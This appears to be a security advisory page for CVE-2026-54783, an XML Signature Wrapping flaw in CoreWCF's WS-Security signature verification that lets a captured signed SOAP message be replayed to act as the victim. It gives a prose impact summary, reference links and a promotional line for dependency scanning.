CVE-2026-54783: CoreWCF: XML Signature Wrapping in WS-Security endorsing/supporting signature verification allows replay of captured signed messages

June 19, 2026

The attacker, with one captured signed SOAP envelope from a victim and no other privileges, can invoke arbitrary operations on the service as the victim principal for the lifetime of the captured signing key. There is no rate limit on replays. The DetectReplays setting on transport-security bindings does not mitigate the issue because the attack does not reuse the original timestamp — the fresh timestamp in the wsse:Security header is what the replay-detection logic inspects.

References

github.com/CoreWCF/CoreWCF/security/advisories/GHSA-gqv6-pwcg-87r8
github.com/advisories/GHSA-gqv6-pwcg-87r8
nvd.nist.gov/vuln/detail/CVE-2026-54783

Code Behaviors & Features

Detect and mitigate CVE-2026-54783 with GitLab Dependency Scanning

Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →